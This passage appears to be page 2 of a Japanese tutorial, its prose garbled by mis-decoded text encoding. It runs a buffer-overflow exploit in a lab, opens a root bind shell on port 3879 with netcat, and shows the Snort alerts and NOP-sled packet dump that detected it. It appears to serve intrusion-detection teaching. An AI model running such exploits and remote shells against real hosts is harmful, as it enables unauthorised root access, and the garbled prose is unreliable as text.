’ʏí‚̃Aƒ^ƒbƒNi192.168.1.10 ¨ 192.168.1.4j

# ./exp 192.168.1.4 2600










‰ãљ°f‰˜/E–ã‰]E‰]
êI‰M©ME€1EEêAf‰]æd”åE‰Mè‹Eæ‡EEEƒ@¦ME€‰˜ACE‰˜AE‰’Ñ•Q?‰˜Ë€‰˜?EEE†F‰E

EEU
Eâßÿÿÿ/bin/sh êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ
êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ
êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ
êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ
êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ
êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ
êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ
êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ
êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ
êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ
êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ
êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ
êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ
êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ[

@‚ł́Anetcat‚ŃAƒ^ƒbƒN‚ª¬Œ÷‚µ‚½‚©‚ðŠm”F‚µ‚Ă݂悤B

# nc 192.168.1.4 3879
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),
4(adm),6(disk),10(wheel)

@ƒAƒ^ƒbƒN‚ª¬Œ÷‚µAƒ|[ƒg3879‚Å/bin/sh‚ª“®ì‚µ‚Ä‚¢‚邱‚Æ‚ªŠm”F‚Å‚«‚éBƒT[ƒo‘¤‚Å‚ànetstatƒRƒ}ƒ“ƒh‚ÅŠm”F‚µ‚Ä‚Ý‚éB

# netstat -an | grep3879
tcp00 0.0.0.0:38790.0.0.0:* LISTEN

@‚±‚ê‚ŃAƒ^ƒbƒN‚͐¬Œ÷‚µ‚½BŽŸ‚ÉSnort‚̃ƒO‚ŁAUŒ‚‚ªŒŸ’m‚³‚ê‚Ä‚¢‚é‚©Šm”F‚·‚éBSnort‚̃Aƒ‰[ƒgƒƒO‚Ì1”ԖڂɁAuSHELLCODE x86 NOOPv‚Æ‚µ‚āA¡‰ñ‚̃Aƒ^ƒbƒN‚ªŒŸ’m‚³‚ê‚Ä‚¢‚éB2‚–ڂ̃Aƒ‰[ƒgƒƒO‚ÍnetcatƒRƒ}ƒ“ƒh‚Å/bin/sh‚ɐڑ±‚µidƒRƒ}ƒ“ƒh‚ðŽÀs‚µ‚½Û‚̃ƒO‚¾B

ƒAƒ‰[ƒg

08/17-15:05:56.149304 [**] [1:648:5] SHELLCODE x86 NOOP [**] [Classification: E
xecutable code was detected] [Priority: 1] {TCP} 192.168.1.10:1026 -> 192.168.1.4:2600
08/17-15:09:44.413709[**] [1:498:3] ATTACK RESPONSES id check returned root [*
*] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.1.4:3879 -> 192.168.1.10:1033

ƒƒO

[**] SHELLCODE x86 NOOP [**]
08/17-15:15:13.000371 192.168.1.10:1034 -> 192.168.1.4:2600
TCP TTL:64 TOS:0x0 ID:1476 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0xDC6D5422Ack: 0xDCEDF57Win: 0x7D78TcpLen: 32
TCP Options (3) => NOP NOP TS: 132257 2202797
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90......
`ˆÈ‰º—ª`

PREV 2/5 NEXT


Special

- PR -

Special

- PR -